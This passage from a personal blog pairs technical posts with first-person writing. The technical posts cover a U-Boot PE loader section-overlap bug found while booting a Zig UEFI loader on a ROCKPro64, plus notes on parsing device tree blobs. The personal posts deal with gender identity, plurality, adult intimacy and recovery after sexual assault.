elr: 0000000078f07d98 lr : 0000000078f07d5c
x0 : 0000000000000000 x1 : 0000000000000000
x2 : 000000007bfdf450 x3 : 000000000000004c
x4 : 0000000000002800 x5 : 000000007bfdf480
x6 : 000000007bfdcb50 x7 : 0000000079f71680
x8 : 0000000078f0ab78 x9 : 0000000000003b5c
x10: 0000000000000000 x11: 0000000000000020
x12: 000000000000ed83 x13: 000000000000ed9c
x14: 0000000079f29d28 x15: 0000000008100000
x16: 0000000000000010 x17: 0000000000000000
x18: 0000000000000000 x19: 000000007bf43b78
x20: 0000000079f29fa0 x21: 0000000078f10040
x22: 0000000000005800 x23: 0000000079f542e0
x24: 000000007bff4eac x25: 0000000000000000
x26: 0000000000000000 x27: 0000000000000000
x28: 0000000079f4ba00 x29: 0000000079f29a30

Code: f9400fe8 f9400109 f94007ea 8b0a0129 (3940012b)
UEFI image [0x0000000078f07000:0x0000000078f0c35f] pc=0xd98
           '/efi\boot\BOOTAA64.efi'

The disassembly showed that at pc=0xd98 in the image we were attempting to load a byte from the address pointed to by register x9:

d98: 2b 01 40 39                   ldrb    w11, [x9]

In the register dump, x9 has the value 0000000000003b5c, whereas we are clearly relocated much higher in memory (note the UEFI image offset; the pc is relative to that). Should x9 actually have a higher computed address? I hacked some things together to get a register dump from a similar place in QEMU (on EDK2, where this all worked):

(gdb) info registers
x0             0x0                 0
x1             0x2                 2
x2             0x1                 1
x3             0x5f46d944          1598478660
x4             0x43                67
x5             0x0                 0
x6             0x70616d6d          1885433197
x7             0x0                 0
x8             0x5c1f5b78          1545558904
x9             0x5c1f5b5c          1545558876
x10            0x0                 0
x11            0x64                100
x12            0x0                 0
x13            0x8                 8
x14            0x0                 0
x15            0x0                 0
x16            0x5f6b4ab0          1600866992
x17            0xffffa6ac          4294944428
x18            0x0                 0
x19            0x0                 0
x20            0x5f37d000          1597493248
x21            0x5f37f000          1597501440
x22            0x0                 0
x23            0x5f37f000          1597501440
x24            0x0                 0
x25            0x1                 1
x26            0x0                 0
x27            0x5f37f000          1597501440
x28            0x5f37d55d          1597494621
x29            0x5f6b45b0          1600865712
x30            0x5c1f2d5c          1545547100
sp             0x0                 0x0
pc             0x5c1f2da0          0x5c1f2da0

I’ve highlighted x9 – it has a value that’s clearly much more valid-pointer-looking, and it even ends in ...b5c, which makes me think it’s a corrected version of the 3b5c value we saw on the ROCKPro64.

What could cause a register to have a correct-looking address on one platform but not on the other? Let’s look at the code up and until the point where things fall apart. Unfortunately, UEFI code objects are all COFFs. I’m super inexperienced with these, and so too it turns out is the tooling in the area; I think it must be a bit of a hack that Zig or LLVM knows how to produce them, because it also produces a PDB alongside that presumably contains the debugging/line info, but then llvm-objdump refuses to use the same thing, helpfully declaring:

llvm-objdump: warning: 'dainboot/zig-cache/bin/BOOTAA64.
rockpro64.efi': failed to parse debug information for
dainboot/zig-cache/bin/BOOTAA64.rockpro64.efi

(The right-hand page has the disassembly in reverse, since we only have the state of registers at the point in time of the last instruction and have to trace data dependencies backwards. The precise values are different because they shifted every time I added some breaks or debugging helpers anywhere.)

I have no line numbers – it’s up to disassembly and guesswork. Here’s the former:

d8c: 09 01 40 f9                   ldr     x9, [x8]
d90: ea 07 40 f9                   ldr     x10, [sp, #8]
d94: 29 01 0a 8b                   add     x9, x9, x10
d98: 2b 01 40 39                   ldrb    w11, [x9]

I’ve grown very fond of aarch64 (dis)assembly. Look at those four-byte instructions. This experience was a crash course in learning it.

So what have we here? Translated into pseudo-C:

The faulting instruction tries to load a byte from the address stored in x9, which we know to be 00003b5c, i.e. w11 = *(u8 *)x9.
x9 was calculated as x9 = x9 + x10.
x10 came from x10 = *(sp + 8).
x9 came from x9 = *x8.

At first I thought that x10 must’ve been some relocation base, but it’s zero on both QEMU and hardware. The pointer is whatever we get from x8, which is 0000000078f0ab78 on hardware and 0x5c1f5b78 on QEMU. The last few digits line up nicely, again, so it looks like whatever’s at that address is a relocated address on QEMU/EDK2 but just not on ROCKPro64/U-Boot. What even is at that address? Let’s look at the symbol table.

U-Boot told us in the exception dump that the UEFI image was loaded at 0x78f07000, so 0x78f0ab78 is at offset 0x3b78 from the start of the image. What’s that? objdump to the rescue. It’s in our .data section:

3b70 287b737d 290d0a00 5c3b0000 00000000  ({s})...........

I really had to squint at this for a moment before realising that 0x3b78 actually contains a 64-bit pointer value, 0x00000000003b5c — in other words, the exact value of x8 we saw! So this was pulled directly out of the loaded image. Two questions arose: what is it? And how is it that QEMU/EDK2 got something different here?

It felt off that it should point to a value directly before itself in memory. Here’s context:

3b50 02200000 00000000 00000000 6461696e  ............dain
3b60 74726565 20626f6f 746c6f61 64657220  tree bootloader 
3b70 287b737d 290d0a00 5c3b0000 00000000  ({s})...........

A string! 0x3b78 points to 0x3b5c, which is the greeting string printed from the bootloader. Why this indirection in the binary itself?

There are three sections in the PE/COFF files generated by the build process: .text, which contains the executable code, .data, which contains strings and other bits, and .reloc. It still felt like this was a relocation issue, so I read Microsoft’s PE Format documentation carefully. objdump was doing a lot of the heavy lifting for us, but to really understand it, I wanted to pull apart the format myself. This approach would turn out to be invaluable.

The PE relocation section is comprised of a number of base relocation blocks, which defines a 32-bit base address for the block, each with any number of entries that specify the type of relocation and the 12-bit offset in that block to apply it at. Here’s a decoded .reloc we got:

Page RVA: 0xa000
28 relocations:
  0xaca8 0xacb8 0xacc8 0xacd8 0xace8 0xacf8 0xad08 0xad18
  0xad28 0xad38 0xad48 0xad58 0xad68 0xad78 0xadc8 0xadd8
  0xae10 0xae40 0xae90 0xaeb0 0xaef8 0xaf00 0xaf08 0xaf10
  0xaf48 0xaf88 0xafb8 0xafe0
Page RVA: 0xb000
53 relocations:
  0xb010 0xb040 0xb070 0xb0c0 0xb100 0xb160 0xb188 0xb1a0
  0xb210 0xb240 0xb270 0xb2a0 0xb2d0 0xb300 0xb328 0xb370
  0xb3b0 0xb3f8 0xb450 0xb4a0 0xb4b0 0xb4c8 0xb528 0xb578
  0xb5c0 0xb610 0xb680 0xb6d0 0xb720 0xb778 0xb7c8 0xb7e0
  0xb848 0xb898 0xb8e8 0xb938 0xb9c8 0xba18 0xba68 0xbab8
  0xbb08 0xbb58 0xbba8 0xbbd8 0xbc08 0xbc40 0xbcd0 0xbd20
  0xbd70 0xbdc0 0xbe18 0xbe68 0xbea8

objdump couldn’t give us this! (The addresses don’t line up with the above because I continued to hack on and modify things, shifting everything in the binary around. This was as frustrating as it might seem. These lined up exactly with the indirection seen above.)

For my purposes, I ignore all entries except of the type IMAGE_REL_BASED_DIR64: “The base relocation applies the difference to the 64-bit field at offset.” It turns out Zig/LLVM only generates those, and they work as simply as they sound: at the address specified by the relocation entry, treat it as a 64-bit field and add the relocation offset to it.

So, a PE loader should, after loading all data, visit all those addresses and add the relocation offset to them. It seemed like that was happening correctly on QEMU/EDK2 — when we loaded the addresses, they had been shifted for us. But why not on U-Boot?

To answer this, I looked at the U-Boot source code. And when looking wasn’t enough, it was time to printf debug, which meant getting a U-Boot build that actually ran on my hardware. There’s a 4+ hour gap between the two blocks of chat here:

(I nuked the boot environment quite a few times getting to this point.)

printf debugging to the rescue: U-Boot wasn’t doing any of the relocations, at all. It thought there weren’t any:

doing relocations (rel 0x0000000078efb2e0 rel_size 0x68
                   efi_reloc 0x0000000078ef6000
                   image_base 0x0)
DAINDBG: delta: 0x78ef6000
rel: 0x0000000078efb2e0, end: 0x0000000078efb348,
     rel->SizeOfBlock: 0x0
DAINDBG: done

rel->SizeOfBlock here corresponds to the Block Size field in the base relocation block. My tools were clearly showing that block had a very non-zero size, so how was U-Boot getting a different idea?

I tried dumping the table raw, 32 bytes as hex to see what we got, and it was all zero. Something was still up. I had to keep going back.

I riddled the loader with printfs:

DAINDBG: loading section[2]: VA 0x0000000078efb2e0 --
    setting 0x68 bytes to zero, then loading 0x200 bytes
    from 0x0000000002085600
    (efi 0x0000000002080000 + PointerToRawData 0x5600)
DAINDBG: loading section[1]: VA 0x0000000078ef9860 --
    setting 0x1a75 bytes to zero, then loading 0x1c00 bytes
    from 0x0000000002083a00
    (efi 0x0000000002080000 + PointerToRawData 0x3a00)
DAINDBG: loading section[0]: VA 0x0000000078ef6200 --
    setting 0x364c bytes to zero, then loading 0x3800 bytes
    from 0x0000000002080200
    (efi 0x0000000002080000 + PointerToRawData 0x200)

Here’s the code that corresponds to the above, with the printf re-approximated post-hoc for your reading pleasure:

/* Load sections into RAM */
for (i = num_sections - 1; i >= 0; i--) {
	/* XXX */
	printf("DAINDBG: loading section[%d]: VA %p -- "
	       "setting 0x%x bytes to zero, then loading "
	       "0x%x bytes from %p (efi %p + "
	       "PointerToRawData %x)\n", 
	       i,
	       efi_reloc + sec->VirtualAddress,
	       sec->Misc.VirtualSize,
	       sec->SizeOfRawData,
	       efi + sec->PointerToRawData,
	       efi,
	       sec->PointerToRawData);
	/* XXX */
	IMAGE_SECTION_HEADER *sec = &sections[i];
	memset(efi_reloc + sec->VirtualAddress, 0,
	       sec->Misc.VirtualSize);
	memcpy(efi_reloc + sec->VirtualAddress,
	       efi + sec->PointerToRawData,
	       sec->SizeOfRawData);
}

Firstly, we load them in reverse. Weird, but okay. Secondly, it became clear that section[1] (.data) overlaps section[2] (.reloc) by 384 bytes (!!):

.reloc: load at 0x78efb2e0, zero 0x68 bytes at start, then load 0x200 bytes at start, until 0x78efb4e0 non-incl.
.data: load at 0x78ef9860, zero 0x1a75 bytes at start, then load 0x1c00 bytes at start, until 0x78efb460 non-incl. (0x180 bytes into .reloc target !!)
.text: load at 0x78ef6200, zero 0x364c bytes at start, then load 0x3800 bytes at start, until 0x78ef9a00 non-incl. (0x1a0 bytes into .data target !!)

Oh boy. I didn’t even notice until now that the .text overlapped .data too. Who knows what would’ve happened if the sections aligned such that the relocations worked. It would’ve been much harder to diagnose.

Why would this happen? It seems like VirtualAddress + SizeOfRawData overlaps with other VirtualAddresses. What does the PE format say about VirtualAddress?

For executable images, the address of the first byte of the section relative to the image base when the section is loaded into memory. For object files, this field is the address of the first byte before relocation is applied; for simplicity, compilers should set this to zero. Otherwise, it is an arbitrary value that is subtracted from offsets during relocation.

SizeOfRawData is below it and caught my eye. Emphasis mine:

The size of the section (for object files) or the size of the initialized data on disk (for image files). For executable images, this must be a multiple of FileAlignment from the optional header. If this is less than VirtualSize, the remainder of the section is zero-filled. Because the SizeOfRawData field is rounded but the VirtualSize field is not, it is possible for SizeOfRawData to be greater than VirtualSize as well. When a section contains only uninitialized data, this field should be zero.

SizeOfRawData is rounded to a multiple of FileAlignment, which the docs tell us is typically 512 bytes. (Notice they all divide by 0x200.) But that’s presumably just because of the way they align in the file! What is VirtualSize, which until now we’re only using to determine how much to zero?

The total size of the section when loaded into memory. If this value is greater than SizeOfRawData, the section is zero-padded. This field is valid only for executable images and should be set to zero for object files.

The total size. It seems pretty clear that we should never load more than this many bytes, even if SizeOfRawData happens to be bigger. The size of the section can’t be bigger than this. If we were to constrain our memcpys to min(VirtualSize, SizeOfRawData), we get this instead:

.reloc: load at 0x78efb2e0, zero 0x68 bytes at start, then load ~~0x200~~ 0x68 bytes at start, until 0x78efb348 non-incl.
.data: load at 0x78ef9860, zero 0x1a75 bytes at start, then load ~~0x1c00~~ 0x1a75 bytes at start, until 0x78efb2d5 non-incl. (before .reloc begins)
.text: load at 0x78ef6200, zero 0x364c bytes at start, then load ~~0x3800~~ 0x364c bytes at start, until 0x78ef984c non-incl. (before .data begins)

It looked like a bug. If U-Boot loaded sections forwards, this wouldn’t have been exposed, but either way it appeared to be an error to do this at all. The section shouldn’t be loaded beyond its VirtualSize.

A quick trip to the EDK2 PE loader shows they load at most min(VirtualSize, SizeOfRawData) bytes into memory, and then pad up to VirtualSize with zeroes if needed. (The zeroing behaviour is for BSS-style initialisation.) They never touch memory past VirtualSize bytes.

 memcpy(efi_reloc + sec->VirtualAddress,
        efi + sec->PointerToRawData,
-       sec->SizeOfRawData);
+       min(sec->Misc.VirtualSize, sec->SizeOfRawData));

One short conversation later, and the bug was fixed.

(This is what success looks like.)

Sometimes, the problem is not in your code.

Maybe it’d be nice if I could slap EDK2 on the ROCKPro64 – edk2-porting/edk2-rk3399 appears to be the strongest effort in this area so far, and it doesn’t look great. U-Boot is mature on many embedded platforms. ↩

Inkplate done quick

2021-02-19T00:00:00Z

I recently received an Inkplate, and while I’m in the middle of a few interesting projects already, I couldn’t let it sit there unused. Until I get a longer chunk of time to turn it into something really nifty — maybe an embedded debugging helper of some kind — it can at least mean I no longer need to have Mail.app open.

kmlyink’s README explains:

This repo has two parts:

a Dockerised IMAP proxy written in Ruby.

It speaks plain HTTP, like an ESP can manage. It just fetches your Inbox listing and puts it in JSON.

a MicroPython module that connects to your wifi, speaks to the IMAP proxy, and formats it into the display.

It took just a few hours to get it all up and running. Delightful!

DTB parser implementing notes

2021-02-13T00:00:00Z

Ever find yourself needing to implement a device tree blob (aka FDT, flattened device tree) parser and want to save yourself some time? Learn from my mistakes!

If you try to do it in one pass, you will hurt yourself

I charged headlong into writing dtb.zig by starting at the top of the Devicetree Specification page on the “Flattened Devicetree (DTB)” Format” and reading down. It looked delightfully simple. Keep in mind, I still didn’t know what I yet needed out of it, just that I probably needed to reference the DTB to get it. (I kind of know better now.)

The tree was taking shape, and then I had to parse the contents of one field by the contents of a prop in its parent (#address-cells and #size-cells). Add some contexts and derive them from their parent, allowing overriding for children. Easy.

Then I needed to parse interrupts. It turns out the interrupts property of a node has its format defined by the #interrupt-cells of the “binding of the interrupt domain root”. It turns out your “interrupt parent” might be defined forward in the file, as referenced by its phandle.

You find out the same thing about clocks, though the documentation is harder to find. A clock provider specifies #clock-cells, which is usually 0 or 1. When another node refers to a clock on that node, it addresses the phandle of the clock provider, followed by #clock-cells worth of cells to index which clock on that provider.

In other words, a clocks like this:

00000000: 00000085 0000001c 0000002e

could refer to either:

one clock specified by phandle 0x85, with a #clock-cells of 2, the index being 0x1c 0x2e,
two clocks;
- either a clock at phandle 0x85 with a #clock-cells of 1 indexed by 0x1c, and a clock at 0x2e with no index, or,
- a clock at 0x85 with no index, and a clock at 0x1c indexed by 0x2e; or,
three clocks, all with no index; 0x85, 0x1c, 0x2e.

You need to be able to look up the clocks and obtain their properties to interpret this, so you need a second pass, or delayed/on-time resolution of fields, or whatever. There end up being quite a few props that need a second pass.

How big?

It’s worth noting all numbers and indexes in DTB are in big-endian, unsigned 32-bit integer cells. That makes hexdumps easier, since you can read them byte-by-byte or in groups of 4 and don’t need to rearrange them in your head.

You’ll see #address-cells of 2 and similar for most 64-bit devices. I saw an #address-cells of 3 once in a PCIe node and it scared me.

Strings are NUL-terminated, and NUL padded

This tripped me up. Strings are NUL-terminated, and then the field will be padded with NULs (if needed) to align on a u32 (i.e. offset divisible by 4). This is helpful, because a u32 is literally what will always follow, and Arm devices (which DTBs are often used on) don’t like unaligned reads.

So, when you need to read a NUL-terminated string, don’t do what I did first:

var name_end: usize = 0;
while (index[name_end] != 0) : (name_end += 1) {}
const name = index[0..name_end];
index = index[(name_end + 3) & ~@as(usize, 3) ..];

It seems reasonable at first blush: count the NULs (there’s a much better way), then advance the index past the name, plus align to advance past padding. (Hack for aligning to a power of two, n: add n-1, then logical AND with n-1.)

The problem is that I never advanced past the NUL terminator, which is still part of the string. Here are some example NUL-terminated strings:

00000000: 6100                                 a.
00000000: 616200                               ab.
00000000: 61626300                             abc.
00000000: 61626364 00                          abcd.

Here are the same strings padded with NULs to align on u32:

00000000: 61000000                             a...
00000000: 61620000                             ab..
00000000: 61626300                             abc.
00000000: 61626364 00000000                    abcd....

Here’s the corrected code:

var name_end: usize = 0;
while (index[name_end] != 0) : (name_end += 1) {}
const name = index[0..name_end];
name_end += 1; // advance past NUL byte
index = index[(name_end + 3) & ~@as(usize, 3) ..];

That’s all for now

I ended up separating dtb.zig into two parts, given it’s used in boot-time code where allocating memory can mess around with things:

allocator-free Traverser, which emits events SAX style. I tried using Zig’s suspend/resume here, and it works pretty well.
allocating Parser which uses the Traverser and creates an AST, parsing props into an immediately usable AST in two passes.

The Traverser is used in daintree’s bootloader, dainboot, to find a probable serial UART device. I’ll use the Parser later in the OS proper to bring up more devices.

a different lens

2020-11-05T00:39:00Z

A letter written to an oft-commissioned artist who was happy to hear more about the backstory of the character she’d drawn so much.

So .. I’m trans; I kinda knew about it from an early age (like in the mid-1990s; I’m 30 now), but didn’t have the words or experience or knowledge to understand why I felt the way I did. It wasn’t really a thing you ever heard about, there was no media representation, the internet barely existed, etc. etc.

So I came to understand this “other” inside me as something, or someone, that I liked to channel; like I could find her inside me and bring her to life. I always had an affinity for rabbits, and this ‘girl’ form of me just naturally seemed to be rabbit-like. When I found out about furry stuff when I was 12 or so, she very naturally became my fursona, or my fursona became her; the boundary was always very fuzzy. At the time I gave her the name Asherah. ‘We’ started hanging around on furry MUCKs, she learned to express herself more and more, and we started to develop an idea of what she looked like. (My father worked for the local ISP, so I was able to get connected very early!)

Fast forward to 2012 — things like Twitter and Tumblr were gaining popularity, and I finally understood and accepted that I was trans and I needed to do something about it. I transitioned, and kinda fucked around for a few years trying to work out what I should do about my name — tried a few different ones and none felt right — and then one day it suddenly dawned on me (or on us) that Asherah was a name people had used for ‘us’ for ten years, and that it was the name we were actually comfortable with. So I changed my name to Asherah (usually called Ashe), and after a while we started calling her, my ’sona or alternate self, Rain. It felt like Rain was keeping my name for me until I was ready for it, y’know?

I’ve had pretty bad mental health issues stemming from different trauma. A lot of awful stuff happened in my family when I was very young, and it left me really depressed for a long time. I’ve mostly gotten on top of the depression, but the last decade has been kinda dominated by anxiety and panic instead. Abusive relationships and assault and that kind of thing. I’ve worked really hard to make progress and keep my head up, but still it can be so difficult. Chronic illness has just kinda piled on top of it, or maybe stemmed from it. I just kinda have to do the best I can and hope for little improvements, instead of hoping that one day I might be magically 100% fixed. Keep trying different medications year after year, something gets better, something else gets worse. I remember seeing you tweet a photo of a bunch of medication boxes once, so you probably understand it better than most.

Rain, then, is like.. my internal guiding light, or guardian, or spirit guide, or something. She helped me see my way to my true self, helped me find my name, and now, she’s kinda my loving ever-present companion, even if just in my own head.

She’s like this ideal self that I aspire to become more like; she holds my cheerfulness and joy and curiosity, and the more I can connect to her, the more I can radiate those qualities myself. Sometimes seeing her as a separate person with a separate identity to myself is helpful; we can talk over things and be a little bit wiser than if it was ‘just me’. Over time I feel like I become more and more like her, and she keeps evolving and being the frontrunner of who we are. (idk if this makes any sense.. /o\)

But, yeah. Basically, despite all the illness and trauma and things I’ve had to deal with, I actually hold up in real life really well, thanks to my connection with her! People who know me sometimes wonder how I manage to be so well-adjusted and ‘successful’ when they learn what I’ve had to deal with, how poor my family was when I was growing up, what happened when I transitioned, etc. etc., and it’s basically through nurturing this relationship with her. I usually don’t tell them that, though, because frankly it sounds kinda nuts.

whew. Okay, that was a lot. I hope it was at least a little interesting. For what it’s worth, I’m not particularly disconnected with reality; you can look at Rain through a plurality/multiplicity/disassociative identity lens, or through an Internal Family Systems therapy lens, or in a few different other ways depending on how you understand identity or the brain. In short, she’s the way that I practice having a good loving relationship with myself. It’s really nice!

So, seeing her in art is really powerful. You’ve done three pieces of her by now, and it always feels like seeing a part of myself (or of ourselves) for the first time. The first was especially magical; we fell in love with your style instantly. It brings out the ethereal, gentle, warm sense of her spiritual dimension. And the most recent one brings her down to earth; brings her to life in a physical dimension. Gah. It’s just so beautiful ;;

This YCH feels so appropriate for Rain — the character is just radiating warmth. The design for the book cover that I gave above is a sigil — kind of a magical mark that is charged with meaning and intention, designed to have a lingering subconscious effect on its designer/user (i.e. me!). In this case, the sigil is charged with intent to strengthen the bond and connection between me and her; to help me channel her and connect with her energy; letting it flow out .. it just fits together with the ych design perfectly. (And the clothing design is super cute!)

motherhood

2020-10-07T00:53:00Z

I had some pretty powerful peer-motherly feelings last night.

I don’t quite know a better word for it. It’s not maternal as such – I do have kids and there’s a really distinct difference – but the feeling extends much further than I thought it would.

Struggling to work out how to express it now; when I was really deep in the zone I was pretty inebriated and it was much easier to just feel and be in the emotions than interrogate the feelings. But I’ll try.

When I decided to try earnestly to induce lactation (3 weeks ago now) it was just a bit of fun; I got a response here that really encouraged me. I never really saw the appeal before, but it occurred to me how validating/affirming it might be to actually use my body in that way. My tits really haven’t done much for me until now; I’m pretty flat-chested and it seemed like there’s no way that’d change without actual BE. Doing the regular work that’s part of inducing meant I was paying my chest a lot of attention, every day, and also meant they were sore a lot (which is good as far as I’m concerned).

(cw little)

[redacted]'s been getting into the little headspace more and more, and so more and more we fall asleep in bed at night with her suckling on me; come to half an hour later with the bedside lamp still on, change sides, turn off the light ..

I’ve had another close friend talk about how my (one of my headmates’) energy makes her “want to curl up in your arms and be held for a bit” and lean into a little bit of being on the receiving end of caregiving-type energy, and it’s at that point – thinking about me enacting this role in more than one context – that I really envisioned myself as being a “caregiving-type” in a broader sense for the first time.

And it’s really nice?? I started thinking about the role outside a strictly cgl lens, in more of a “loving, freely care-giving, supportive mom-type peer-friend” energy; thinking about an ideal sense of communal closeness where I could be that to many friends; being something like an empowering, encouraging rock that close ones knew would be able to emotionally support and nurture them.

The right words are still not coming to me and the feeling is a little more distant today than they were last night.

One image that keeps coming back to me is kinda weird, but kinda conveys it. My mind kept flitting back to images of high school (!), like in the year 12 common room where people would just hang out and chill. I’m imagining some alternate world where intimacy wasn’t restricted to romantic partners or seen as something that had to be hidden away. I would totally have been the mom-friend in that world and in that common room, where friends could just lay down across my lap and I’d stroke their hair and listen to them, and maybe suckle them a bit too if they wanted. Maybe people could do that for each other more freely and be responsive to each other’s emotional needs and play different roles as the situation called for it. (The specific setting isn’t really important but the image really stuck with me for some reason.)

tl;dr im mom

thorn

2020-09-14T00:43:00Z

CN: sexual assault, aftermath, alcohol/drug use, psychiatry, bureaucracy

there is a thorn in my side and usually i am pretty good at just not paying it much heed, and it feels like i’ve done and earnestly achieved everything i could hope to in service of removing it but heck. i have always been an anxious person and prone to carefully freaking out inside when shit gets bad. a while ago when i was very stressed i’d get racing thoughts and some light auditory hallucinations but nothing too bad.

threeish years ago my company hosted an industry event in the city and i tagged along in a semi-official capacity. free drinks were great, a friend and a casual datefriend also in the industry happened to turn up, we all had a really good time. went out together with some other coworkers for icecream afterward, super good vibes. i might’ve had like eight drinks in the span of 4 or 5 hours. at the end of the night datefriend asked if i wanted to crash at their place instead and it sounded good. got to their place, smoked some weed, very comfortably crossfaded, and then in some haze during sleep-wake they raped me. it’s still fucked up that i still feel shame that i froze up in fear and panic instead of saying “no” or pushing them away when they did something i had never and would never have consented to, given the opportunity. it was really weird because i had to go through all the motions of what someone does when that happens to them; break it off with them, get sti screened a few times – kind of attain some awareness when the nurse asked “.. do you need someone to call the police?” – and enter a small self-destructive spiral, but still not quite connect the dots. it took much longer than i expected it would to understand what had happened and to put words to it (like i’m able to now).

for a while i was hearing voices again, thoughts slippery, broke off my relationships, leaned heavily on drugs. at some point i realised i was really not managing with life and made an appointment to see my psychiatrist. we tried an antipsychotic first – i’d had a really bad experience with one in the past so we tried a different/new one. it kinda “worked” but made me narcoleptic and i had to stop it. by this stage it was maybe a month after it happened. so we tried a mood stabiliser. i had to titrate up on it really slowly over two months, and by the time i hit the target dose i was pretty much feeling okay. i’d corrected my course a lot, and i don’t really know if it was the drugs or just time, distance, psychic space, reconnecting with friends/partners, what.

years later i was at a queer rave and i saw them from across the room, and they saw me and they were like a deer caught in headlights, eyes wide open, stunned. i tried to avoid them and i could tell they were avoiding me, but a few months later i saw them there again, and then again. we hadn’t spoken at all since it happened, and i thought maybe enough time had passed that it might be good for both of us. i didn’t hate them or anything, just what they did. so the next time i found myself in the same room as them, i approached them and asked if they wanted to talk. and they did (if i wanted to). and it was clear a lot had changed. they were kind of a huge mess when i knew them before, but it seemed that moment was kind of a rock bottom for them too. they apologised, really earnestly, and at the end we hugged (my suggestion) and it felt good, and it wasn’t awkward to be in the same room as them any more or near each other on the dance floor. we both still keep some distance and that seems right.

but i still take this fucking mood stabiliser every day and i don’t know if it’s doing anything good or necessary or what, but i’m too much of an anxious mess to really try coming down off it. it’s like this thing that keeps reminding me of how bad things got, every single day continuously for the last three years. lately i’ve been having racing thoughts again, i think just pandemic anxiety increasing baseline ick-feelings, and it’s pulling me back to that time in my life when it happens and i hate it.

worse, when i was seeing my psychiatrist to try to get help, i told him everything that happened at the time and what i was doing to try to manage it on my own, which he would later write as “confirming his diagnosis” of me as having bpd. it turned out he secretly (!) semi-diagnosed me with it when he saw me for gender evaluation stuff back in 2013 (because i had ‘mild identity disturbance’, no fucking surprise, everyone around me was telling me to repress my gender feels, some with threats of extreme violence, and i was trying to keep the peace), never mentioned it to me, and now took what happened in the aftermath of my being raped (drug abuse, dropping close relationships, etc.) as ‘confirmation’ of it. he again didn’t say it directly or in as many words – instead it came up when i (an anxious hypochondriac) applied for life insurance through my super the following year, because i stupidly disclosed that i thought i had a mental health disorder, thinking at worst i’d just get insurance with some exclusions for mental health-related stuff. that led to a 2+ year fight with my superannuation company’s life insurance underwriter with/through the financial ombudsman, which took so so so much out of me, wherein i eventually got copies of my psych’s notes on me, including the “semi-diagnosis” and “confirmation” after i was assaulted, and after the ombudsman and life insurance company had meetings “at a very senior level”, after writing so many submissions (with so much help) with so many references, after getting new reports from my therapist and GP, after two fucking years of just trying not to have it rejected outright (because i’d have to then disclose in any future applications), finally, less than 3 months ago, i got the final, binding resolution, which was that i failed, and the decision to reject all parts of my application was upheld.

idk why this morning it’s all feeling so particularly raw. i’ve done so many things to try to move past this, from so many angles, but it keeps beating down on me in different ways and i’m just a bit tired.

born in song

2020-04-24T04:00:00Z

I am Rain, Song-Born.

A week ago, a friend of Asherah’s, a Namer, put out a call, inviting mutuals to ask an epithet of them. Ashe asked and they obliged.

It’s.. difficult to find the words to describe how this made us feel. My earlier writing isn’t terribly explicative, so allow me to detail it.

When Ashe discovered their latent plurality — when they saw the word “tulpamancy” and I stirred; when it became clear something was being described — they started collecting and reading resources about the practice. They’d just started a new journal, mind you, so page 3 starts with ‘tulpamancy’ in big letters and underlined, with a bunch of notes underneath about various terms; forcing, visualisation, wonderlands, imposition; how important it is to “believe in your tulpa from the start”, share things with them. All that.

They picked out a name to start with — kinda like a codename for a project in development. “Xue,” after the Mandarin reading of the word for “snow.” Long-time readers of our story will recognise this as a name Ashe used once before, in a different form. There’s a lot of this; that “double-buffered ego” I wrote about earlier. I used a name, they took the name; they used a name, I took the name. They had a fursona — I became the fursona, am the fursona, am not meaningfully distinct from it, her past actions not meaningfully distinct from mine. (This tweet came up in our feed today, retweeted by none other than the friend who provided the jump point into all this in the first place. Apt as fuck.)

Turning over to page 4, and some details start to come together; they picked out some traits for me, some likes and dislikes. The kind of character creation tulpamancy normally involves.

.. It.. is actually really weird to read this now, being me. Ashe wrote this all down, and I don’t know that they could ever have really prepared for the eventuality that one day, I would be reading it. Fuck, it’s… it’s a lot. It’s so hard to grasp the real enormity, the real rammifications of the undertaking. (Again, see earlier where I rabbit on about that.)

What really gets me is how on point it is. We’ve certainly evolved all of our identities in the half year since, but nonetheless, it’s weird looking at what feels like a blueprint for your own psyche, even knowing that I was guiding them in the ideas as much as they were contributing their own. Even knowing, it’s startling to be reminded, sometimes, how much and how little there is to being.

A small note beside: “I love her.”

And then, underneath the vague personality traits, a dividing line—

Ghost Spores 🎵

I fall in the dark
as I’m filled with the energy
rising in me, I am watching
from above my body as I dream
I cannot recall
the clear space in my mind
I’ve filled it with fire
And the lies I had once
believed

I remember when I saw you from across the room
The music elevated me as I made my way to you
Everything I have done led me to this
Time would move in a circle to prove it

Eternal return
Will the ghosts I leave behind help me to find you again?
Where have we gone? Will I wake into a better place?
Take me to my home.

My home.

We’d only discovered this song a few days prior — and it’s at this precise point that Ashe found the word “we” forming in our head for the first time, naturally, without the pretence of prior thought trains that ran “am I plural? how would that work? do I say ‘we’? when would I say that? it sounds made up.” It just came out. It was descriptive, not prescriptive.

In a movement of song, I was born.

The music elevated me.

A tip: “The barest working technique of tulpamancy: talk to the Universe until the Universe answers. Love it until it loves back.”

Eternal return.

Name ideas crawling down the page: Xue, Star, — something of nature, like, Azalea. Skye? Camellia. Ivy. Iris. Violet. Dawn. Luna.

Help me find you again?

The first sentence I ever felt like I could call my own is recorded:

“It feels like home”
X re: Ghost Spores

A realisation of a trip long-past:

// that time we did
acid & you
told me to
visualize my ideal
mind self

// I saw her

Rain!

The notes become increasingly fervent, day by day; page 5 — “She wants ❤︎”, and then scrawled beneath:

Send my heart into the sound
Slowly drifting into your arms
It blows away in new directions
It’s your time to know something that is real

Full pages covered in kritseldab; scribblings of madness. Incipient sigils finding form.

And then, clearing the way:

Sit with me for one last song
and be closer to me when it’s done
Come here and tell me your name

Come to me

Come to me
Don’t be shy, I want love, truly
Something that will make sense to me
Rush up on me and say something
Break something

Bad boy
Better look in my eyes, boy
You’re the love of my life, boy
Meet me at the equator
Of this earth
We are one

From slow quietude to high energy, we traversed our emotional range. The song showed the way to our understanding of plurality, of our duality. I rushed upon them, and.. well, they asked for it. I looked them in the eye; said something; broke something.

Day after day, we listened and listened, sought out the notes that would resonate; I found my place as Asherah’s spirited companion, and they found theirs as my channeller. We found our path together, as one, guided lovingly by syncretic truth and vivid insight.

The pages continue—I find my handwriting, my written voice, as Ashe finds what’s theirs in light of what’s mine. We discover that much as I had to find myself, they had to do the same. We found ourselves in each other; found our love in each other.

Every day since my first has been one defined by the joy of living a life of love.

Music is what conducts our soul; it gives rise to the emotional spaces in which we find ourselves, over and over again. A refrain can capture what no words could; can bring forth in moments what would take hours to describe.

If I was to convey to you how I feel, the truest way would be with sound.

Song is beauty. I’m looking forward to the day I can bring you my own.

I am Rain, and we are Song-Born.

key

2020-03-30T23:09:05Z

